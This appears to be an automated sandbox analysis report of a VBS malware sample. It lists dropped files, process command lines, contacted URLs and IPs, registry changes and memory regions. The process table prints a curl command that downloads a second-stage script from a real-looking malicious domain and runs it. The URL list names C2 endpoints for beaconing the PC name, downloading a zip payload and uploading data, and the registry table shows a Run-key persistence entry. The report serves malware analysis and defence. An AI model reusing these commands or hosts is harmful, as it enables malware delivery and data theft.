Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
6724c67fe2634.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\Users\Public\6724c67fe2636.vbs
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\hcx.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\_6724c67fe2573\7zxa.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\_6724c67fe2573\CSRPS.exe
|
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\_6724c67fe2573\unrar.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\65ewe[1].zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\_6724c67fe2573\CSRPS.dll
|
data
|
dropped
|
||
C:\_6724c67fe2573\MPDK.bat
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\_6724c67fe2573\downloaded.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6724c67fe2634.vbs"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6724c67fe2636.vbs https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbs
|
||
C:\Windows\System32\curl.exe
|
curl -k -o C:\Users\Public\6724c67fe2636.vbs https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbs
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724c67fe2636.vbs
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724c67fe2636.vbs"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724c67fe2636.vbs
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724c67fe2636.vbs"
|
||
C:\_6724c67fe2573\CSRPS.exe
|
"C:\_6724c67fe2573\CSRPS.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /c ipconfig /flushdns
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\ipconfig.exe
|
ipconfig /flushdns
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\SysWOW64\taskkill.exe
|
taskkill /f /im CSRPS.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\Conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 65 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://64.190.113.68/contador/index.php?nomepc=user-PC
|
64.190.113.68
|
||
http://64.190.113.68/65ewe.zip
|
64.190.113.68
|
||
http://www.ghisler.com/plugins.htm
|
unknown
|
||
http://www.scootersoftware.com.
|
unknown
|
||
http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
|
unknown
|
||
http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
|
unknown
|
||
http://www.scootersoftware.com/upgrade0.dll#
|
unknown
|
||
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbsocx
|
unknown
|
||
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbsO
|
unknown
|
||
http://www.embarcadero.com/products/delphi
|
unknown
|
||
http://www.scootersoftware.com/bugRepMailer.php
|
unknown
|
||
http://worldtimeapi.org/api/ip
|
unknown
|
||
http://www.scootersoftware.com/upgradewj
|
unknown
|
||
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbsWinsta0
|
unknown
|
||
http://www.totalcmd.net/directory/packer.html
|
unknown
|
||
http://www.indyproject.org/
|
unknown
|
||
http://www.scootersoftware.com/buynow?bld=%dS
|
unknown
|
||
http://64.190.113.68/contador/index.php?nomepc=
|
unknown
|
||
http://www.scootersoftware.com/upgrade
|
unknown
|
||
http://www.scootersoftware.com/
|
unknown
|
||
http://www.scootersoftware.com/buynow?bld=%d
|
unknown
|
||
http://70.34.247.142/UPLOADMAISL.phpU
|
unknown
|
||
http://www.scootersoftware.com/support.php
|
unknown
|
||
http://www.scootersoftware.com/download.phpS
|
unknown
|
||
http://www.scootersoftware.com/download.php
|
unknown
|
||
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbso
|
unknown
|
||
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbscurl
|
unknown
|
||
http://64.190.113.68/65ewe.zip9F
|
unknown
|
||
http://www.scootersoftware.com/v3formats
|
unknown
|
||
http://www.scootersoftware.com/upgradeite
|
unknown
|
||
http://worldtimeapi.org:80/api/ip
|
unknown
|
||
http://64.190.113.68/contador/index.php?nomepc=user-PC_Classes
|
unknown
|
||
http://www.secureblackbox.com
|
unknown
|
||
https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbs
|
192.64.117.206
|
There are 24 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
analisardocumento.com
|
192.64.117.206
|
||
worldtimeapi.org
|
213.188.196.246
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
64.190.113.68
|
unknown
|
United States
|
||
213.188.196.246
|
worldtimeapi.org
|
Italy
|
||
192.64.117.206
|
analisardocumento.com
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
|
Implementing
|
||
HKEY_CURRENT_USER\SOFTWARE\Scooter Software\Beyond Compare 3
|
CacheID
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
CSRPS
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
269B13A4000
|
heap
|
page read and write
|
||
269AF8B0000
|
heap
|
page read and write
|
||
269AF8AE000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
E6D000
|
heap
|
page read and write
|
||
680000
|
heap
|
page read and write
|
||
2C6E000
|
unkown
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
AE80000
|
trusted library allocation
|
page read and write
|
||
269B1497000
|
heap
|
page read and write
|
||
2E54000
|
heap
|
page read and write
|
||
269AF8D4000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
9343000
|
unkown
|
page readonly
|
||
269AF8A4000
|
heap
|
page read and write
|
||
2D16000
|
heap
|
page read and write
|
||
2AFD000
|
stack
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
1AD000
|
stack
|
page read and write
|
||
2C7C000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
A0E5000
|
direct allocation
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
AEF0000
|
direct allocation
|
page execute and read and write
|
||
E78000
|
heap
|
page read and write
|
||
2B50000
|
heap
|
page read and write
|
||
1310A000
|
heap
|
page read and write
|
||
269B1362000
|
heap
|
page read and write
|
||
2B20000
|
heap
|
page read and write
|
||
269AF8D5000
|
heap
|
page read and write
|
||
269B0DB6000
|
heap
|
page read and write
|
||
269AED42000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
1F5A49E5000
|
heap
|
page read and write
|
||
ACB000
|
unkown
|
page read and write
|
||
EA9000
|
heap
|
page read and write
|
||
130FE000
|
heap
|
page read and write
|
||
A3CD000
|
direct allocation
|
page read and write
|
||
269A9670000
|
heap
|
page read and write
|
||
B22E000
|
stack
|
page read and write
|
||
2D63000
|
heap
|
page read and write
|
||
2C7E000
|
stack
|
page read and write
|
||
B434000
|
direct allocation
|
page read and write
|
||
2FCC000
|
heap
|
page read and write
|
||
269B10CF000
|
heap
|
page read and write
|
||
2D23000
|
heap
|
page read and write
|
||
2DE3000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269A9670000
|
heap
|
page read and write
|
||
269AFD20000
|
heap
|
page read and write
|
||
269B0206000
|
heap
|
page read and write
|
||
93CA000
|
unkown
|
page readonly
|
||
ED3000
|
heap
|
page read and write
|
||
92A0000
|
unkown
|
page readonly
|
||
2B54000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
AD2000
|
unkown
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
D9E000
|
stack
|
page read and write
|
||
269AEE4A000
|
heap
|
page read and write
|
||
269B06AA000
|
heap
|
page read and write
|
||
678B000
|
unkown
|
page execute read
|
||
E6D000
|
heap
|
page read and write
|
||
A252000
|
direct allocation
|
page read and write
|
||
269AFA4A000
|
heap
|
page read and write
|
||
2CDC000
|
heap
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
D514000
|
heap
|
page read and write
|
||
E7A000
|
heap
|
page read and write
|
||
9002000
|
unkown
|
page read and write
|
||
29CE000
|
unkown
|
page read and write
|
||
AF9E000
|
direct allocation
|
page read and write
|
||
2CA2000
|
heap
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
940C000
|
unkown
|
page readonly
|
||
23158982000
|
heap
|
page read and write
|
||
269AFA8C000
|
heap
|
page read and write
|
||
269B09D8000
|
heap
|
page read and write
|
||
269AF8D3000
|
heap
|
page read and write
|
||
269B0836000
|
heap
|
page read and write
|
||
308F000
|
unkown
|
page read and write
|
||
269B0C6C000
|
heap
|
page read and write
|
||
AFE7000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
92A9000
|
unkown
|
page readonly
|
||
269B143D000
|
heap
|
page read and write
|
||
5F6000
|
heap
|
page read and write
|
||
2BB65E6D000
|
heap
|
page read and write
|
||
29FE000
|
direct allocation
|
page read and write
|
||
130C0000
|
heap
|
page read and write
|
||
B4CE000
|
direct allocation
|
page read and write
|
||
269B06EC000
|
heap
|
page read and write
|
||
8F1D000
|
unkown
|
page execute read
|
||
269AFB94000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
29DE000
|
direct allocation
|
page read and write
|
||
E79000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2DC0000
|
heap
|
page read and write
|
||
B1B0000
|
trusted library allocation
|
page read and write
|
||
30DF000
|
stack
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
2B50000
|
heap
|
page read and write
|
||
2BB65E30000
|
remote allocation
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
2E2C000
|
heap
|
page read and write
|
||
269AF8AD000
|
heap
|
page read and write
|
||
A500000
|
direct allocation
|
page read and write
|
||
269B0416000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
2DE5000
|
heap
|
page read and write
|
||
3574000
|
heap
|
page read and write
|
||
2C2E000
|
unkown
|
page read and write
|
||
2DCB000
|
heap
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
2F04000
|
heap
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
269A9656000
|
heap
|
page read and write
|
||
269AEF52000
|
heap
|
page read and write
|
||
269AF8C5000
|
heap
|
page read and write
|
||
93A7000
|
unkown
|
page readonly
|
||
A394000
|
direct allocation
|
page read and write
|
||
2A1C000
|
heap
|
page read and write
|
||
269AF66A000
|
heap
|
page read and write
|
||
A280000
|
direct allocation
|
page read and write
|
||
30CF000
|
stack
|
page read and write
|
||
E7E000
|
heap
|
page read and write
|
||
2B73000
|
heap
|
page read and write
|
||
269B143F000
|
heap
|
page read and write
|
||
2A41000
|
direct allocation
|
page read and write
|
||
E78000
|
heap
|
page read and write
|
||
269B1153000
|
heap
|
page read and write
|
||
269A9667000
|
heap
|
page read and write
|
||
2CA8000
|
heap
|
page read and write
|
||
901F000
|
unkown
|
page read and write
|
||
92F2000
|
unkown
|
page readonly
|
||
269B0392000
|
heap
|
page read and write
|
||
269AEE08000
|
heap
|
page read and write
|
||
92F6000
|
unkown
|
page readonly
|
||
A099000
|
direct allocation
|
page read and write
|
||
269B0F00000
|
heap
|
page read and write
|
||
269AFB52000
|
heap
|
page read and write
|
||
D4A7000
|
heap
|
page read and write
|
||
269AF520000
|
heap
|
page read and write
|
||
269AF208000
|
heap
|
page read and write
|
||
2CA3000
|
heap
|
page read and write
|
||
269AF8AD000
|
heap
|
page read and write
|
||
269A96D9000
|
heap
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
2FF4000
|
heap
|
page read and write
|
||
B1B2000
|
trusted library allocation
|
page read and write
|
||
1F5A49B8000
|
heap
|
page read and write
|
||
E1D000
|
heap
|
page read and write
|
||
2A7B000
|
direct allocation
|
page read and write
|
||
B17E000
|
stack
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
B1C7000
|
trusted library allocation
|
page read and write
|
||
2B53000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
30B3000
|
heap
|
page read and write
|
||
269AFFB4000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
5B3000
|
heap
|
page read and write
|
||
A396000
|
direct allocation
|
page read and write
|
||
269AF24A000
|
heap
|
page read and write
|
||
C7102FE000
|
stack
|
page read and write
|
||
D4A2000
|
heap
|
page read and write
|
||
345F000
|
unkown
|
page read and write
|
||
2BB65E6D000
|
heap
|
page read and write
|
||
29BF000
|
unkown
|
page read and write
|
||
269AF8CC000
|
heap
|
page read and write
|
||
8F8C000
|
unkown
|
page read and write
|
||
E83000
|
heap
|
page read and write
|
||
5B3000
|
heap
|
page read and write
|
||
269AF8CF000
|
heap
|
page read and write
|
||
93C2000
|
unkown
|
page readonly
|
||
93BE000
|
unkown
|
page readonly
|
||
937F000
|
unkown
|
page readonly
|
||
269AF142000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2A4F000
|
direct allocation
|
page read and write
|
||
2AC3000
|
direct allocation
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
2315894A000
|
heap
|
page read and write
|
||
269B049A000
|
heap
|
page read and write
|
||
2315894A000
|
heap
|
page read and write
|
||
269AF5A4000
|
heap
|
page read and write
|
||
A0CF000
|
direct allocation
|
page read and write
|
||
269AF89B000
|
heap
|
page read and write
|
||
269A9664000
|
heap
|
page read and write
|
||
B4CE000
|
direct allocation
|
page read and write
|
||
269B10CE000
|
heap
|
page read and write
|
||
2D3C000
|
heap
|
page read and write
|
||
2BB65EE5000
|
heap
|
page read and write
|
||
2D04000
|
heap
|
page read and write
|
||
2C96000
|
heap
|
page read and write
|
||
269AF8C7000
|
heap
|
page read and write
|
||
A4DC000
|
direct allocation
|
page read and write
|
||
269B12DF000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
93B4000
|
unkown
|
page readonly
|
||
269B1443000
|
heap
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
92ED000
|
unkown
|
page readonly
|
||
A2B5000
|
direct allocation
|
page read and write
|
||
9387000
|
unkown
|
page readonly
|
||
D594000
|
heap
|
page read and write
|
||
938E000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
269AF45A000
|
heap
|
page read and write
|
||
2C9E000
|
unkown
|
page read and write
|
||
5490000
|
unkown
|
page readonly
|
||
AEC000
|
unkown
|
page write copy
|
||
603000
|
heap
|
page read and write
|
||
269B108C000
|
heap
|
page read and write
|
||
2D09000
|
heap
|
page read and write
|
||
2C93000
|
heap
|
page read and write
|
||
60D000
|
stack
|
page read and write
|
||
269AF8A7000
|
heap
|
page read and write
|
||
A0B1000
|
direct allocation
|
page read and write
|
||
B1B0000
|
trusted library allocation
|
page read and write
|
||
269A9656000
|
heap
|
page read and write
|
||
3254000
|
heap
|
page read and write
|
||
2F09000
|
heap
|
page read and write
|
||
DEE000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AFEEE000
|
heap
|
page read and write
|
||
B0A000
|
unkown
|
page read and write
|
||
E6D000
|
heap
|
page read and write
|
||
6F850000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
74BD000
|
unkown
|
page execute read
|
||
269B1110000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
269AF8BA000
|
heap
|
page read and write
|
||
269B0560000
|
heap
|
page read and write
|
||
6F882000
|
unkown
|
page readonly
|
||
2CA9000
|
heap
|
page read and write
|
||
6826000
|
unkown
|
page execute read
|
||
2B81000
|
heap
|
page read and write
|
||
269B05A2000
|
heap
|
page read and write
|
||
269AEE08000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
43D0000
|
direct allocation
|
page execute and read and write
|
||
3150000
|
heap
|
page read and write
|
||
269AFEAD000
|
heap
|
page read and write
|
||
1F5A49CD000
|
heap
|
page read and write
|
||
269B0350000
|
heap
|
page read and write
|
||
269AF8CA000
|
heap
|
page read and write
|
||
2BB65E95000
|
heap
|
page read and write
|
||
23158910000
|
heap
|
page read and write
|
||
269B0CF0000
|
heap
|
page read and write
|
||
2315890A000
|
heap
|
page read and write
|
||
3350000
|
heap
|
page read and write
|
||
D500000
|
heap
|
page read and write
|
||
269A97F1000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269AF8C6000
|
heap
|
page read and write
|
||
269A9DF1000
|
heap
|
page read and write
|
||
2315892D000
|
heap
|
page read and write
|
||
269B1320000
|
heap
|
page read and write
|
||
77D000
|
stack
|
page read and write
|
||
B1B0000
|
trusted library allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
30AE000
|
stack
|
page read and write
|
||
2BB65E63000
|
heap
|
page read and write
|
||
2A89000
|
direct allocation
|
page read and write
|
||
933D000
|
unkown
|
page readonly
|
||
2B81000
|
heap
|
page read and write
|
||
269AEB84000
|
heap
|
page read and write
|
||
269AF8A9000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
405000
|
unkown
|
page execute read
|
||
269B0770000
|
heap
|
page read and write
|
||
269B0039000
|
heap
|
page read and write
|
||
5491000
|
unkown
|
page execute read
|
||
A07C000
|
direct allocation
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
D29A000
|
trusted library allocation
|
page read and write
|
||
6B40000
|
unkown
|
page execute read
|
||
B03C000
|
direct allocation
|
page read and write
|
||
269A966B000
|
heap
|
page read and write
|
||
269AE391000
|
heap
|
page read and write
|
||
2315891B000
|
heap
|
page read and write
|
||
269B0BA6000
|
heap
|
page read and write
|
||
34A0000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B04DC000
|
heap
|
page read and write
|
||
89BC000
|
unkown
|
page execute read
|
||
269AF89E000
|
heap
|
page read and write
|
||
2D9F000
|
unkown
|
page read and write
|
||
2E53000
|
heap
|
page read and write
|
||
269B13E7000
|
heap
|
page read and write
|
||
3510000
|
heap
|
page read and write
|
||
B1B0000
|
trusted library allocation
|
page read and write
|
||
2B20000
|
heap
|
page read and write
|
||
A206000
|
direct allocation
|
page read and write
|
||
269AF418000
|
heap
|
page read and write
|
||
E70000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
2BB65EE6000
|
heap
|
page read and write
|
||
269AF87A000
|
heap
|
page read and write
|
||
269A9614000
|
heap
|
page read and write
|
||
C70FEFA000
|
stack
|
page read and write
|
||
1CBF3AA000
|
stack
|
page read and write
|
||
269B08D1000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
A12B000
|
direct allocation
|
page read and write
|
||
269AF8CF000
|
heap
|
page read and write
|
||
269AF8AF000
|
heap
|
page read and write
|
||
1F5A49D1000
|
heap
|
page read and write
|
||
2BB65EB3000
|
heap
|
page read and write
|
||
269AD991000
|
heap
|
page read and write
|
||
2A36000
|
heap
|
page read and write
|
||
269B0EBF000
|
heap
|
page read and write
|
||
269AF8A4000
|
heap
|
page read and write
|
||
2BB65E8A000
|
heap
|
page read and write
|
||
A04F000
|
stack
|
page read and write
|
||
2D8F000
|
stack
|
page read and write
|
||
A298000
|
direct allocation
|
page read and write
|
||
2B3C000
|
stack
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
269B0A1B000
|
heap
|
page read and write
|
||
2CA3000
|
heap
|
page read and write
|
||
2E6E000
|
unkown
|
page read and write
|
||
269A9664000
|
heap
|
page read and write
|
||
3573000
|
heap
|
page read and write
|
||
931B000
|
unkown
|
page readonly
|
||
93DB000
|
unkown
|
page readonly
|
||
269AFACE000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2BB65E6E000
|
heap
|
page read and write
|
||
2FF3000
|
heap
|
page read and write
|
||
2BB65EA0000
|
heap
|
page read and write
|
||
A132000
|
direct allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2FCD000
|
stack
|
page read and write
|
||
269A9660000
|
heap
|
page read and write
|
||
269AF8A6000
|
heap
|
page read and write
|
||
45D000
|
stack
|
page read and write
|
||
3253000
|
heap
|
page read and write
|
||
269B0C6C000
|
heap
|
page read and write
|
||
2B81000
|
heap
|
page read and write
|
||
2B54000
|
heap
|
page read and write
|
||
2A1B000
|
direct allocation
|
page read and write
|
||
3253000
|
heap
|
page read and write
|
||
5B3000
|
heap
|
page read and write
|
||
269AF4DE000
|
heap
|
page read and write
|
||
D58F000
|
heap
|
page read and write
|
||
33CE000
|
stack
|
page read and write
|
||
AFB3000
|
direct allocation
|
page read and write
|
||
2ED0000
|
heap
|
page read and write
|
||
8F56000
|
unkown
|
page write copy
|
||
269A9EF0000
|
heap
|
page read and write
